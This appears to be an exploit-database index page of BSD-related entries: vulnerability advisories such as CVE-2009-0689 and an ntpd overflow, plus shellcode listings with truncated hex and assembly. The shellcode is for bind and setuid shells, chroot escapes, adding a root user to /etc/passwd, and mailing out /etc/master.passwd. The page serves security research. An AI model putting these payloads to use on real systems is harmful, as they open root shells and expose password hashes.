FreeBSD Meterpreter Service, Bind TCP

Stub payload for interacting with a Meterpreter Service This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 0 include Msf::Payload::Bsd include Msf::Payload::Single include...

多个BSD系统gdtoa/misc.c文件内存破坏漏洞

BUGTRAQ ID: 35510 CVECAN ID: CVE-2009-0689 OpenBSD、NetBSD、FreeBSD都是流行的BSD操作系统，是Unix的衍生系统。 OpenBSD、NetBSD、FreeBSD的dtoa实现中存在数组溢出漏洞。在src/lib/libc/gdtoa/gdtoaimp.h中： - ---gdtoaimp.h--- ... define Kmax 15 ... - ---gdtoaimp.h--- 最大的Kmax长度为15，如果提供了更大的值（如17），程序就会溢出freelist数组，bss为0x1。 以NetBSD为例： -...

BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption

source: https://www.securityfocus.com/bid/35510/info Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. Attackers may exploit this issue to execute arbitrary code within the context of affected...

BSD (Multiple Distributions) - gdtoamisc.c Memory Corruption

BSD Multiple Distributions - gdtoamisc.c Memory Corruption source: https://www.securityfocus.com/bid/35510/info Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. Attackers may exploit this iss...

ntpd autokey stack buffer overflow

Overview ntpd contains a stack buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system or create a denial of service. Description NTP Network Time Protocol is a method by which client machines can synchronize the local date and time wit...

kernel: memory disclosure in SO_BSDCOMPAT gsopt

The sockgetsockopt function in net/core/sock.c in the Linux kernel before 2.6.28.6 does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel memory via an SOBSDCOMPAT getsockopt request...

kernel: memory disclosure in SO_BSDCOMPAT gsopt

The sockgetsockopt function in net/core/sock.c in the Linux kernel before 2.6.28.6 does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel memory via an SOBSDCOMPAT getsockopt request...

kernel: memory disclosure in SO_BSDCOMPAT gsopt

The sockgetsockopt function in net/core/sock.c in the Linux kernel before 2.6.28.6 does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel memory via an SOBSDCOMPAT getsockopt request...

Fedora Update for hsqldb FEDORA-2007-4119

Check for the Version of hsqldb OpenVAS Vulnerability Test Fedora Update for hsqldb FEDORA-2007-4119 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the term...

BSD/x86 - setuid/portbind - 94 bytes

No description provided by source. / $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ portbind-bsd.c - setuid/portbind shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Simple portbind shellcode that bind's a setuid0 shell on port 31337/tcp based on bighawk's...

BSD/x86 - setuid/execve - 30 bytes

No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. Tested on OpenBSD and FreeBSD. / ...

BSD/x86 - cat /etc/master.passwd & mail root@localhost - 92 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; pueden reemplzar el comando por lo que se les ocurra. / char shellcode= "\xeb\x25" / jmp shellcode+39 / "\x59" / popl...

BSD/x86 - execve(/bin/sh) - 27 bytes

No description provided by source. / execvesh.c by n0gada 27 bytes. / include "stdio.h" char shellcode= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int mainvoid int ret; printf"%d\n",strlenshellcode; ret = int &ret+2; ret = intshellcode; return...

BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...

Linux/x86 - symlink /bin/sh xoring

No description provided by source. /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version with anti IDS xoring size = 56 bytes OS = BSD written by /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor ecx,e...

BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)

BSD/x86 - execve/bin/sh Shellcode 28 bytes. Shellcode exploit for BSDx86 platform / simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode =...

BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)

BSD/x86 - Write to /etc/passwd with uid0 + gid0 Shellcode 74 bytes. Shellcode exploit for BSDx86 platform / writes the line for user in /etc/passwd with uid&gid == 0 OS: BSD length: 74 written by dev0id [email protected] rootteam.void.ru rus-sec /Efnet.org greetz: mig nerf BITS 32 main: xor eax,eax...

BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes)

BSD/x86 - Break chroot ../ 10x Loop Shellcode 40 bytes. Shellcode exploit for BSDx86 platform / One of the smallest chroot shellcodes it will put '../' 10 times Size 40 bytes OS BSD /rootteam/dev0id rootteam.void.ru [email protected] BITS 32 jmp short callme main: pop esi mov edi,esi xor...

BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes)

BSD/x86 - setuid0 + Break chroot ../ 10x Loop + Bind TCP 2222/TCP Shell Shellcode 133 bytes. Shellcode exploit for BSDx86 platform / The setuid0+chroot+bind shellcode it will: setuid0 put '../' 10 times in chroot open shell on 2222nd port Size 133 bytes OS BSD /rootteam/dev0id rootteam.void.ru...

BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes)

BSD/x86 - setuid0 + Break chroot ../ 10x Loop + execute /bin/sh Shellcode 57 bytes. Shellcode exploit for BSDx86 platform / The setuid0+chroot+execve shellcode it will: setuid0 put '../' 10 times in chroot execute /bin/sh Size 57 bytes OS BSD /rootteam/dev0id rootteam.void.ru [email protected]...